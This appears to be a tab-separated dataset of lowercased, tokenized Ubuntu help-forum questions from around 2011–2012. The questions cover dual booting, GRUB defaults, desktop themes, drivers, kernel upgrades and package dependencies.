97348	can i dual boot windows 7 ( x64 ) with ubuntu 11.10 in sony vaio ea36 ?	yes , the question same on the title . can i ? are you there using sony vaio ea36 notebook ? i wondering to install ubuntu 11.10 alongside windows . if can , tell me what things ( such as : repair disk ) must i do to preparing install the ubuntu ? please answer soonly .
97350	how to get those `` glass '' title bar buttons ( lucid 's ambiance theme )	it 's a minor issue , but i keep seeing those nice-looking ubuntu title bar buttons , like here : and i just ca n't find out how to get these . i have the default , flat ubuntu buttons . is it a theme that must be downloaded through the download center ? ( i 've looked around but have n't found anything ) it 's probably something small that i 've overlooked , but i really want those nice buttons ! : - ) ps : the menus in the specified screenshot look really nice as well , if i could get these as well , my day would be made ! : - ) thanks a lot for any suggestions ! edit : thanks to the moderator for making the post look better . : - )
97358	installing windows on ubuntu	i 've 2 hard disks . i 've installed ubuntu on the hda ( 0 ) , but there are plenty of spaces . but on the hda ( 0 ) there is only one partition . my question how can i edit / create another partition on hda ( 0 ) to install windows xp on the 2nd partition ? how can i install windows xp on hda ( 1 ) and still be able to boot in windows xp or ubuntu ?
97360	how to stream internet radio in a browser ?	i am trying to stream a internet radio station using a browser . it appears like it is loading but i do n't hear any sound . this is the station i am trying to stream : http : //tunein.com/tuner/ ? stationid=68906 ( it is a regional radio station and is in tamil . ) when i try to stream it in rhythmbox , i get the following error message : required plugin could not be found python ( v2.7 ) requires to install plugins to play media files of the following type : text/html decoder i do n't think this is a network firewall problem because i can listen to the radio when i am on windows 7 . i am expecting it to be an issue of a missing plugin .
97361	how to set up web disk with nautilus in ubuntu 11.10 ?	i have a folder on my system ( running ubuntu 11.10 ) that i want to be synced to a directory on my personal server ( running centos / cpanel ) . this is how i am trying to achieve it ... set up a web disk use 'grsync ' tool to sync my local folder to my server ( which is now just another directory - - web disk ) so , i guess you get my point . but i do n't understand how to setup a web disk . these are the instructions : i opened nautilus , which is just the window manager . but i do not see the address bar . i also checked folder preferences , and it 's not there . so , how do i proceed ?
97371	how do i install davical ?	i 'm using ubuntu 11.4 oneiric ocelot and tried to set up the davical server . i have installed it and added the users davical_app and davical_dba . a tutorial on http : //wiki.davical.org/w/ubuntu_maverick told me to say no to all three questions . then it said to add the following lines to /etc/postgresql/main/9.1/pg_hba.conf : local davical_app trust local davical_dba trust i tried to restart the postgresql server as the manual told me by the following init script : /etc/init.d/postgresql restart but this failed . the command told me that it could n't load the pg_hba files because of line 77 and 78 : the ones i 've added . then i restarted my computer because i thought then the postgresql server must restart too . i tried to run the shell script in su postgres -c /usr/share/davical/dba/create-database.sh anyway , but it said that it could n't find the postgresqlserver . on http : //mergy.org/2011/11/fixing-davical-and-postgresql-on-ubuntu-11-10/ i found a tutorial to fix davical and postgresql 9.1 but that did n't help . what can i do to get it run on my ubuntu system ?
97373	what is the difference between nvidia driver version 173 and version current ?	i have noticed that the additional/restricted drivers control panel allows me to select a nvidia gpu driver and the options are 173 and current . what are the differences between the two ? are there reasons someone might choose to use 173 vs the current version when the current version is the recommended version ?
97379	ca n't change grub 2 default os	i want to change windows 7 to my default os because it has all the programs i want , but i ca n't get grub to change to default os . i tried startupmanager and looked through all the configuration files i could find , and i consistently see windows 7 listed as the default , but when i boot , it automatically starts ubuntu because it is at the top and it is the highlighted os . i was able to change the start up time to 20 seconds . help ? x64 windows 7 , x64 ubuntu 11.10 separate partitions /etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=6 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=20 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' splash vga=791 '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' /boot/grub/grub.cfg : # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 6 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 9e5513f9-01ca-4ffd-86ea-22349a390861 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=1024x768 load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 9e5513f9-01ca-4ffd-86ea-22349a390861 set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=20 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 3.0.0-14-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 9e5513f9-01ca-4ffd-86ea-22349a390861 linux /boot/vmlinuz-3.0.0-14-generic root=uuid=9e5513f9-01ca-4ffd-86ea-22349a390861 ro splash vga=791 quiet splash vt.handoff=7 initrd /boot/initrd.img-3.0.0-14-generic } menuentry 'ubuntu , with linux 3.0.0-14-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 9e5513f9-01ca-4ffd-86ea-22349a390861 echo 'loading linux 3.0.0-14-generic ... ' linux /boot/vmlinuz-3.0.0-14-generic root=uuid=9e5513f9-01ca-4ffd-86ea-22349a390861 ro recovery nomodeset splash vga=791 echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.0.0-14-generic } submenu `` previous linux versions '' { menuentry 'ubuntu , with linux 3.0.0-12-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 9e5513f9-01ca-4ffd-86ea-22349a390861 linux /boot/vmlinuz-3.0.0-12-generic root=uuid=9e5513f9-01ca-4ffd-86ea-22349a390861 ro splash vga=791 quiet splash vt.handoff=7 initrd /boot/initrd.img-3.0.0-12-generic } menuentry 'ubuntu , with linux 3.0.0-12-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 9e5513f9-01ca-4ffd-86ea-22349a390861 echo 'loading linux 3.0.0-12-generic ... ' linux /boot/vmlinuz-3.0.0-12-generic root=uuid=9e5513f9-01ca-4ffd-86ea-22349a390861 ro recovery nomodeset splash vga=791 echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.0.0-12-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 9e5513f9-01ca-4ffd-86ea-22349a390861 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 9e5513f9-01ca-4ffd-86ea-22349a390861 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sda2 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set=root 1ef42d2656b7aa07 chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # #
97388	how do i get same scrollbar style for gtk-2.0 and gtk-3.0 apps ?	sorry for my english mistakes , i 'm spanish . i 'm using ubuntu 11.10 in a tablet . i 've removed overlay-scrollbars and i have increased the scrollbars size to use them with fingers . in /usr/share/themes/ambiance/gtk-2.0/gtkrc i 've changed : gtkscrollbar : :slider-width = 23 gtkscrollbar : :min-slider-length = 51 and added : gtkscrollbar : :has-backward-stepper = 0 gtkscrollbar : :has-forward-stepper = 0 in /usr/share/themes/ambiance/gtk-3.0/gtk-widgets.css i 've changed : gtkscrollbar-min-slider-length : 51 ; gtkrange-slider-width : 23 ; ( in .scrollbar item ) now my scrollbars are usable with fingers , but they seem different for gtk-2.0 and gtk-3.0 apps . in the picture the left scrollbar is a gtk-2.0 app and the right one is a gtk-3.0 i want to setup gtk2.0 bar to be exactly the same as gtk3.0 , that is make upper and lower extremes empty ( oranges circles in the picture ) reduce the length of the 3 horizontal lines ( black ellipse ) can somebody help me ? thanks . hola . uso ubuntu 11.10 en una tableta ; he quitado overlay-scrollbars y he incrementado el tamaño de las barras para poder usarlas con los dedos . concretamente en /usr/share/themes/ambiance/gtk-2.0/gtkrc be cambiado gtkscrollbar : :slider-width = 23 gtkscrollbar : :min-slider-length = 51 y añadido gtkscrollbar : :has-backward-stepper = 0 gtkscrollbar : :has-forward-stepper = 0 en /usr/share/themes/ambiance/gtk-3.0/gtk-widgets.css he cambiado gtkscrollbar-min-slider-length : 51 ; gtkrange-slider-width : 23 ; ( en el apartado.scrollbar ) mis barras son manejables con dedos , pero se ven muy distintas para aplicaciones gtk-2.0 y gtk-3.0 . la barra de la izquierda de la imagen es 2.0 y la de la derecha es 3.0 quiero configurar las barras 2.0 exactamente como las 3.0 , para lo que necesito vaciar los extremos de la barra ( círculos naranjas en la imagen ) reducir la longitud de las 3 líneas horizontales ( elipses negras en la imagen ) ¿alguna idea ? gracias .
97389	network manager icon does n't appear in top panel	recently i 've installed ubuntu 11.10 and i have a problem with network-manager because the icon in top bar disappeared and i do n't know how to get it back . i tried to edit networkmanager.conf and set true in managed but nothing happened . how do i get the network manager icon in the top panel back ?
97391	sometimes ubuntu takes 2 minutes to start	sorry for the english mistakes , i 'm spanish . i have a tablet with ubuntu 11.10 completely updated . sometimes it takes about 35 seconds to boot , i suppose it 's a right time . however , there are lots of times which takes about 2 minutes . the screen is black about 100 sconds without any message . unfortunately this happens very often and randomly : maybe there are 3 wrong times , then 1 right one , 8 wrong , 3 right , 1 wrong , 2 right ... no pattern at all . i copy the results of dmesg command in a 'good ' and 'bad ' boot : good boot ( about 35 seconds ) : http : //pastie.org/3186757 wrong boot ( about 120 seconds ) http : //pastie.org/3186449 edit : thanks to rinzwind and janc , i 've investigated and the booting issue appears always at the same point : [ less than 1 second ] pci 0000:00:02.0 : boot video device [ 98 seconds before ] pci : cls 64 bytes , default 64 hola , poseo una tableta con ubuntu 11.10 completamente actualizado . en ocasiones tarda 35 segundos en arrancar , imagino que es un tiempo normal de arranque . sin embargo muy a menudo tarda 2 minutos en arrancar . después de encender la tableta la pantalla se queda negra durante aproximadamente 100 segundos . por desgracia esto ocurre muy a menudo y de forma aleatoria : por ejemplo 3 arranques malos , 1 bueno , 8 malos , 3 buenos , 1 malo , 2 buenos ... no sigue ningún patrón . copio los resultados del comando dmesg en un arranque 'bueno ' y uno 'malo ' : arranque bueno ( unos 35 segundos ) : http : //pastie.org/3186757 arranque malo ( unos 120 segundos ) http : //pastie.org/3186449 edito : gracias a rinzwind y janc , he investigado y el error aparece siempre en el mismo sitio : [ less than 1 second ] pci 0000:00:02.0 : boot video device [ 98 seconds before ] pci : cls 64 bytes , default 64
97395	liveusb desktop does n't load on an inspiron b130	i recently downloaded ubuntu 11.10 and set up a live usb , and i 'm trying to get it to work on this set of hardware : dell inspiron b130 512 mb ram 40 gb hdd intel celeron m processor i 'm currently using the live usb with no known issues on my dell xps studio 16 ( core2duo 2.66 , 4gb ram ) so i 'm fairly confident it 's not the usb or a corrupted iso . when i run the usb on the inspiron , it loads to the usb boot screen , and if i tell it to run ubuntu from the usb it loads and goes to the desktop , however i have no icons or sidebar/topbar . any help will be appreciated !
97399	why wo n't ubuntu 11.10 fully boot ?	i get stuck on boot-up and need help . i get an error message that says : 103.795829 drm : drm_crtc_helper_set_config . error failed to set mode on crtc:6 . can anyone help me fix this ?
97400	maintaining privacy on the web ?	i just read an article about the importance of anonymity on the web.. is it possible to maintain anonymity using services like ubuntu one , and are there any native system tools within ubuntu that will help me to maintain privacy and/or anonymity ? i 'm using ubuntu 11.10 64bit .
97401	downloading to usb	i downloaded the program and clicked on the option to download it to a usb drive but once downloaded it prompted that i burn it to a cd but my netbook does n't have a cd-rom . suggestions ?
97404	libnotfy1 ( > = 0.4.4 ) and libnotify1-gtk2.10 for ubuntu 11.10	i have recently downloaded the latest version of lotus symphony 3.0.1 but whenever i try to install it , it shows the following dependencies . can anybody tell where i can find these dependencies . dpkg : dependency problems prevent configuration of symphony : symphony depends on **libnotify1 ( > = 0.4.4 ) ** ; however : package libnotify1 is not installed . symphony depends on **libnotify1-gtk2.10** ; however : package libnotify1-gtk2.10 is not installed . dpkg : error processing symphony ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : symphony
97405	why resting unity interface ? почему сбрасывается unity окружение ?	previously , it was when i closed my ktorrent . folder on the desktop and changed the subject became gray , and the inscription underneath in black letters . folder nautilus became not rounded as usual , but ostrouglymi with gray . now , it happens less frequently . if earlier it was not understandable , because of what was dropped on the topic of unity windows interface gnome.to now it happens every time you close your browser opera , and if at that time i copy something from disk to disk , then copying is reset , and folders that have been open , too closed . nasty bug . in general the system has become more convenient to use than 10.04 , there is at least completely update the system get out different bugs . there is one single bug that climbs into his eyes , hoping not to me alone , so please change this nonsense as soon as possible . as long as we use the buggy system ? hopefully in the future , the ubuntu will not always be associated with the test system , and when something becomes stable . i use a distro ubuntu 11.10 . nautilus 3.2.1 version . i connect third-party repositories , but without them , just discharged standard theme unity . that is to cure this problem and i hooked up an additional repository for unity , but it did not solve the problem . раньше так было , когда я закрывал ktorrent . папки на рабочем меняли тему и становились серыми , а надписи под ними чёрными буквами . папки nautilus становились не закруглёнными как обычно , а остроуглыми с серым цветом . теперь так происходит стало реже . если раньше это было не объяснимо , из за чего сбрасывалась тема unity на интерфейс окон gnome.то теперь это происходит при каждом закрытии браузера opera , причём если в это время я что то копирую с диска на диск , то копирование сбрасывается , и папки которые были открыты , тоже закрываются . неприятный баг . вообщем системой стало пользоваться более удобнее , чем в 10.04 , там хоть полностью обновишь систему вылезают разные баги . тут же один единственный баг , который лезет в глаза , надеюсь не мне одному , поэтому прошу изменить эту ерунду как можно скорее . доколе мы будем пользоваться глючной системой ? надеюсь убунту в будущем не будет ассоциироваться с вечно тестируемой системой , а когда нибудь станет стабильной . я использую дистрибутив ubuntu 11.10 . nautilus 3.2.1 версия . подключаю сторонние репозитории , но и без них так же сбрасывалась стандартная тема unity . именно , чтобы вылечить эту проблему я и подключил дополнительный репозиторий для unity , но это проблему не решило . sorry , that no english . but for me in russian easy explain this problem , and i hope here reading by russian . if writen in english i am not scared , if by russian - just by lucky .
97406	pianobar - error protocol incompatible	this error pops up when i try to run `` pianobar '' from my ubuntu 11.10 terminal ( i ) login ... error : protocol incompatible . please upgrade libpiano . i have upgraded libpiano but it still does n't work . what gives ?
97407	php compiler/interpreter	how to install php compiler/interpreter on ubuntu 11.04 i have latest version of php , but i want to learn php from terminal . is there a php interpreter available that will run php programs inside terminal . e.g . i want to run command like `` phpc '' or `` phpi '' or `` php '' to open up php repl . thanks .
97410	i filed a bug report and now its expired . what do i do now ?	i filed a bug report . eventually i was asked to test the new version . i was slow in responding . now the bug report is expired . it 's still a problem . do i just file a new bug report , or is there something else i should do ?
97412	upgrading software center in zorinos 5	i currently run zorinos 5 ultimate . how do i upgrade to the newest ubuntu software center . or at least , refresh the full package list so i can stop instlling older packages ?
97415	project ideas for newbies .	i am a college student who is taking a sort of introductory class to unix , linux ( and to be honest i have been accustomed to it and like it better than widows now ) and we have just covered the commands on unix . we are now getting into shell script and we are required to write a script for a project . my main problem it is up to us to come up with an idea for it . since i am new at this , i am not that yet familiar with it to feel comfortable to come up with ideas . if you have any ideas , challenging but not involving anything to do with networking or something like that because we have not touched it or going to , it would be very very helpful . i was thinking to develop a game ( any simple one ) say tetris ( for example ) via shell scripting . is this possible to do it if i even sit to study for advanced bash scripting . guides ? help .
97418	ca n't click or use keyboard in my user account	all of a sudden , when i log in to my user account and unity desktop shows up , i can not click anything ( but the mouse pointer moves ) , and the keyboard does not control anything . my desktop is totally locked up . i have to use main power to log out and reboot . if i log in to the guest desktop account , everything works fine . i can also log in to my account via ssh . i am using 11.10 . i have rebooted my system numerous times , and i have waited 30 minutes after log in just in case something is still loading . what could the problem be ? how can i resolve this problem without entirely losing files and settings ?
97423	after logging in , nothing happens	i 'm new to ubuntu and this is my first time using it . so basically i get the login screen and after logging in my account , i get to a screen with the wallpaper and the taskbar ( at the top ) and the other bar ( on the left ) is black . i 'm pretty sure i installed everything correctly .
97424	how can i uninstall and reinstall ubuntu from a dual boot system ?	i have attempted to remove ubuntu from a dual boot system ( windows xp , sp3 ) by deleting partitions , using both the ubuntu install cd and gparted . neither worked for me ; instead , all i did was manage to install a new version of ubuntu each time . now , i have 3 versions of ubuntu and one of xp . trouble is , i can not boot up xp . each time i select it from the boot list , a message appears briefly saying chkdsk needs to be run , but instead of running chkdks , my computer restarts . i can boot up ubuntu , so i have a way of getting online , if that is needed to find a solution .
97429	can i have native ipv6 communication ?	i wonder if i can communicate via ipv6 . i know this depends on the isp . is there any simple way how to deterimne if my isp provides ipv6 connection or at least if my router provides this functionality ? if there is not such possibility to use `` real '' ipv6 , what is the best way to simulate it on ubuntu ?
97430	connect webkit webview form to a python callback ?	i am writing a small python and webkit app ; i am using webkit as the ui for my app . what i want to do is to create an interactive element in webkit ( namely a combo box or a set of clickable regions ) and when the user interacts with these elements i can call a python callback to do some processing and then update the webkit view with new information . here is an example of what i want to do : user is presented with a combo box of options ( combo box displayed , i assume , using a html form in webkit ) . when the combo box option is selected , on_combo_selected ( ) is called in my python script which then grabs some data . the data is passed to webkit and the view is updated . how can i do this ?
97435	is there a way to put basic banshee controls in the top bar of unity ?	im looking for a way to put basic controls like pause , play , and skip to the top taskbar ( the area which displays the time , battery , mail , titles of pages in chrome ... ) or some other convenient way to have banshee controls available to me at all times even when in a maximized window .
97441	ubuntu 11.10 very slow	i have laptop hp 6720s . this happens when i enter top in terminal : cpu ( s ) : 1.7 % us , 1.0 % sy , 0.0 % ni , 97.0 % id , 0.3 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 2053924k total , 1837352k used , 216572k free , 56876k buffers swap : 2929660k total , 68k used , 2929592k free , 1196700k cached i have intel graphics card . applications opens really slow but wireless is really fast . operations inside applications are slow , too . i have ubuntu for the first time , i totaly moved windows 7 to history : ) hope linux is not this slow usually . please help .
97442	what will happen if i remove `` essential components '' for gnome ?	i 'm using ubuntu 11.10 with gnome 3 . there are some applications that i do n't use or need , for example totem . when i click remove in the software center ( or in synaptic ) , it says `` gnome-core '' and/or `` the gnome desktop environment - essential components '' will be removed as well . i removed these applications about a month ago by ignoring the prompts and once i restarted , ubuntu would not load and would simply sit there at the loading screen . i 'm not sure if removing gnome-core caused this issue , but i really want to remove some of these applications . what is gnome-core and how do i know what essential components are going to be removed ? should i go forth with removing them anyways ?
97445	vsftp user created files can not be read by apache2	i have a ubuntu 11.10 server setup with rackspace . pretty basic setup lamp , vsftp . create a new user for vsftp that can create files on the server perfectly fine . but the files seem to be -rw -- -- -- - when this user creates them , i 'd like to see more of a -rw-r -- r -- so that the files ( .php files ) can be served by apache . where do i change this behaviour ?
97449	firefox addon `` deutsches wörterbuch 2.0.2 '' full of errors	i 'm using the firefox add-on `` deutsches wörterbuch 2.0.2 '' which is based , according to the about-section , on igerman98 . it is full of errors of the form strasse instead of straße , grösse instead of größe and so on . i tried to find the dictionary on disk without success grep `` ^stra '' /home/stefan/.mozilla/firefox/kv88xfop.default/extensions/de-de @ dictionaries.addons.mozilla.org/dictionaries/de-de.dic leads to right form , grep `` ^strasse '' $ ( locate de-de ) grep `` ^strasse '' $ ( locate german ) do n't yield any results . more interesting than finding the erroneous data would be a a corrected dictionary , or another solution . of course i can add over time the right spelling to the user extension , but this will not remove the wrong one ( which are only right for de-ch , where ß is n't used ) . note , that this is not a case of old and new spelling . straße is n't pronounced like strapse with a short vocal . i 'm using firefox 3.6.24 on xubuntu 10.04 with `` deutsches wörterbuch 2.0.2 '' add-on , according to the about-box based on a dictionary called igerman98 from 20091006 .
97451	what is the purpose of having three ( or more ? ) directories with icons ?	all these folders contain icons . /usr/share/app-install/icons /usr/share/icons /usr/share/pixmaps
97458	what if the installer says i do n't have enough available hard disk space ?	i want to install ubuntu 11 on my dell mini 9 . using ubuntu.com , i created a usb drive . i was successful in running ubuntu 11 from the usb drive . however , i could not install ubuntu 11 from the usb drive . there was a screen that had a checklist of three items on it . one of them was having enough free space on my hard disk , which i do not . the hard disk is just too small . the installation process was blocked because of this lack of available space . however , i understand ubuntu does not necessarily need all the drive space specified , that smaller installs using less drive space are possible . this sounds promising , because i use a very small subset of ubuntu , but i am not aware of what other installation options i have . is there a way of bypassing this requirement ( or going to a custom-install ) on the installer ? is there another installation program ? if so , could i get it on my usb drive along with ubuntu 11 ? thank you for your help . update : i am trying to install ubuntu 11.10 . when i booted with my usb drive , it gives me an ubuntu desktop with an icon named `` install ubuntu 11.10 '' . along the way i get the message `` hard disk problems detected '' ( which is basically why i want to do this install ) . the installer asks for 4.4 g and i have 3.8 g. my mini does not have a cd drive .
97462	is there a workaround for ubiquity hanging on laptop-detect on a xubuntu+ubuntu desktop ?	i 've run into https : //bugs.launchpad.net/ubuntu/+source/ubiquity/+bug/873791 when installing both xubuntu and ubuntu via wubi on my laptop . i was wondering if there was a workaround to avoid this hang ?
97464	authentication token manipulation error when i try to change password	i get this message when i try to change my password . everything started when i removed password for my username , so when i go to user accounts , it says `` none '' for password . but when i try to install some application in terminal , it is still wants me to write password . when i leave blank field , does n't help . when i type the old password , still nothing . do you know what 's wrong ?
97465	no sound from lifechat lx-3000 headset	i have had this headset for a while now , and it works great on pc , but when i plugged it into my computer using ubuntu , it recognizes the headset and when i select it no audio comes from the earphones . any help ?
97467	problems while upgrading the kernel in ubuntu 10.04 64 bit to 3.2 version	i run ubuntu 10.04 on a 64 bit machine . i tried upgrading my kernel from 2.6.32-37-generic to 3.2 version . i downloaded the following files : linux-headers_all.deb linux-headers-generic_amd64 linux-image-generic_amd64 then i ran them using the following commands : $ sudo dpkg -i linux-headers-3.2.0-030200_3.2.0-030200.201201042035_all.deb $ sudo dpkg -i linux-headers-3.2.0-030200-generic_3.2.0-030200.201201042035_amd64.deb $ sudo dpkg -i linux-image-3.2.0-030200-generic_3.2.0-030200.201201042035_amd64.deb but i got the following error : setting up linux-image-3.2.0-030200-generic ( 3.2.0-030200.201201042035 ) ... running depmod . update-initramfs : generating /boot/initrd.img-3.2.0-030200-generic w : possible missing firmware /lib/firmware/rtl_nic/rtl8168f-2.fw for module r8169 w : possible missing firmware /lib/firmware/rtl_nic/rtl8168f-1.fw for module r8169 w : possible missing firmware /lib/firmware/rtl_nic/rtl8105e-1.fw for module r8169 w : possible missing firmware /lib/firmware/rtl_nic/rtl8168e-3.fw for module r8169 w : possible missing firmware /lib/firmware/rtl_nic/rtl8168e-2.fw for module r8169 w : possible missing firmware /lib/firmware/rtl_nic/rtl8168e-1.fw for module r8169 w : possible missing firmware /lib/firmware/rtl_nic/rtl8168d-2.fw for module r8169 w : possible missing firmware /lib/firmware/rtl_nic/rtl8168d-1.fw for module r8169 not updating initrd symbolic links since we are being updated/reinstalled ( 3.2.0-030200.201201042035 was configured last , according to dpkg ) not updating image symbolic links since we are being updated/reinstalled ( 3.2.0-030200.201201042035 was configured last , according to dpkg ) running postinst hook script /usr/sbin/update-grub . generating grub.cfg ... found linux image : /boot/vmlinuz-3.2.0-030200-generic found initrd image : /boot/initrd.img-3.2.0-030200-generic error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . found linux image : /boot/vmlinuz-2.6.32-37-generic found initrd image : /boot/initrd.img-2.6.32-37-generic error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . found linux image : /boot/vmlinuz-2.6.32-36-generic found initrd image : /boot/initrd.img-2.6.32-36-generic error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . found windows 7 ( loader ) on /dev/sda1 error : can not seek `/dev/sda ' . found windows vista ( loader ) on /dev/sda2 error : can not seek `/dev/sda ' . found windows vista ( loader ) on /dev/sda4 /usr/sbin/grub-probe : error : can not find a grub drive for /dev/sda4 . check your device.map . done examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.2.0-030200-generic /boot/vmlinuz-3.2.0-030200-generic run-parts : executing /etc/kernel/postinst.d/nvidia-common 3.2.0-030200-generic /boot/vmlinuz-3.2.0-030200-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.2.0-030200-generic /boot/vmlinuz-3.2.0-030200-generic so how should i avoid this ? please help me out . cheers , jayneil .
97469	what is the default debian/ubuntu console ( tty ) font called ?	i 'm currently running ubuntu and a few other linux distributions on my computer and since i use the tty a lot , a good font is pretty important ! does anyone know the name of the default console/tty font used in ubuntu and debian ?
97475	monitor shuts off after installing ubuntu 11.10 64-bit	i installed ubuntu 11.10 64-bit successfully in nomodeset option , but when i boot the installed system the monitor shuts off , so i would like to know how to fix this like i fixed it in the installation if someone knows how to solve this problem , his help will be welcome
97484	how can i change the icons of many folders ?	i have a collection of films on my computer and every film is stored in its own folder with image of its cover . what i would like to do is to change icon of each folder to icon of film 's cover . is there any way to do this quicker than right-clicking on each folder and changing icons manually ?
97487	asus g73sw 's backlit keyboard does n't work , nor does the fn+f3- & f4 hotkeys	asus g73sw 's backlit keyboard does n't work , nor does the fn + f3 and f4 hotkeys . any solutions for this ?
97488	is there any software for flashing nokia mobile phones ?	is there any software in linux for flashing nokia mobile phones ?
97491	command line tool to analyze network response etc	i want to see the tcp communication when i make a http post to a url . what i am looking for is , if they send a redirect during the tcp handshake . how can i test for this ? e.g . i make a http post to www.example.com/1/2 and then the server responds with a redirect to www10.example.com/1/2 i have to sent a http post , and the posted value has to be an xml document . ( i have a sample xml file on disk that i can send if the utility allows this ) .
97495	some programs close when opening program or opening or saving data	librecad worked perfectly for me until i ran the update manager 1/12/1012 . since then it closes when ever i try to save or open a drawing ( dxf . ) i read that i should install the synaptic package manager so i did , and it wo n't open at all . i see the screen for a fraction of a second and then it 's closed . other programs with issues are konversation immediately closes if i select settings from the menu , and skype closes immediately after logging in . if i enter the wrong password , it tells me it 's the wrong password , but if i type in the correct password it closes as soon as it logs in . i 'm a newbie , so i have n't been poking around , changing ownership or anything like that . i tried starting the programs from terminal and i get the following or similar messages : requesting child objects for an interface that is a virtual child itself . qspiadaptor : :getchild invalid child : qwidget ( 0x8ca7d50 , name = `` qt_scrollarea_viewport '' ) 1 assert : `` interface- > childcount ( ) == children.count ( ) '' in file adaptor.cpp , line 200 aborted i use 11.10 32bit on a hp pavillion dv6000 2gb
